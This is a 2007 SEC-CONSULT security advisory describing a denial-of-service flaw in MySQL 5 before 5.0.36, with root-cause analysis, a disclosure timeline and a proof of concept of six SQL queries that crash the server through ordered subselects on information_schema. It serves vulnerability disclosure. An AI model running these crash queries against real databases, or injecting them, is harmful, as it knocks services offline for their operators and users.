MySQL 5 Single Row Subselect Denial of Service

SEC-CONSULT Security Advisory < 20070309-0>

===========================================================================

title: MySQL 5 Single Row Subselect Denial of Service

program: MySQL 5

vulnerable version: < 5.0.36

impact: moderate

homepage: www.mysql.com

found: 2007-02-10

by: S.Streichsbier / SEC-CONSULT / www.sec-consult.com

B.Mueller / SEC-CONSULT / www.sec-consult.com

 

===========================================================================

 

Vendor description:

---------------

 

MySQL, the most popular Open Source SQL database management system, is

developed, distributed, and supported by MySQL AB. MySQL AB is a

commercial company, founded by the MySQL developers. It is a second

generation Open Source company that unites Open Source values and

methodology with a successful business model.

 

[Source: www.mysql.com]

 

Vulnerability overview:

---------------

 

In order to exploit this vulnerability the attacker needs to execute

select statements on the database (e.g. SQL Injection).

 

Starting with version 5, MySQL provides access to the database metadata.

When using functions that operate on strings in combination with

subselects on information_schema tables and additional sorting of the

results with the ORDER BY clause, a null-pointer dereferencation takes

place causing a segmentation fault.

 

This allows an attacker to crash the MySQL database. We have not found

any code execution vector resulting from this bug, though further

research into this and related bugs may provide interesting results.

 

Vulnerability details:

---------------

 

When a subselect in a string function is used,

Item_singlerow_subselect::val_str() is called. As it is not expected

that the result of a single row subselect will be sorted, certain fields

(specifically sort->io_cache) in the allocated struct st_table are not

initalized. Yet, when "ORDER BY" is used in the query, filesort() is run

on the table. The actual segfault occurs in an error handling routine in

filesort():

libmysqld/filesort.cc:

111   FILESORT_INFO table_sort;
(...)
117   memcpy(&table_sort, &table->sort, sizeof(FILESORT_INFO));
120   outfile= table_sort.io_cache;
(..)
269  err:
(..)
276   if (my_b_inited(outfile))

include/my_sys.h:

503 #define my_b_inited(info) (info)->buffer

 

This leads to a null pointer dereference (EAX+8 or EBX+8 = 0x00000008 in

our test installations) crashing mysqld.

 

 

proof of concept:

---------------

 

Any string function can be used to exploit this vulnerability.

SELECT ASCII((SELECT table_name FROM information_schema.columns ORDER BY
1));
SELECT TRIM(LEADING FROM (SELECT table_name FROM
information_schema.columns ORDER BY 1));
SELECT SUBSTR((SELECT table_name FROM information_schema.tables ORDER BY
1),1,1);
SELECT UPPER((SELECT table_name FROM information_schema.tables ORDER BY
1));
SELECT RTRIM((SELECT table_name FROM information_schema.tables ORDER BY
1));
SELECT RPAD((SELECT table_name FROM information_schema.tables ORDER BY
1),1,'lol');

 

vulnerable versions:

---------------

 

All versions since the introduction of INFORMATION_SCHEMA tables seem to

be vulnerable to the Denial of Service attack. The version 5.0.36 fixes

this security issue.

 

vendor status:

---------------

vendor notified: 2007-02-22

vendor response: 2007-02-22

patch available: 2007-03-09

coordinated disclosure: 2007-03-09

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Unternehmensberatung GmbH

 

Office Vienna

Blindengasse 3

A-1080 Wien

Austria

 

Tel.: +43 / 1 / 890 30 43 - 0

Fax.: +43 / 1 / 890 30 43 - 15

Mail: research at sec-consult dot com

www.sec-consult.com

 

EOF Stefan Streichsbier / @2007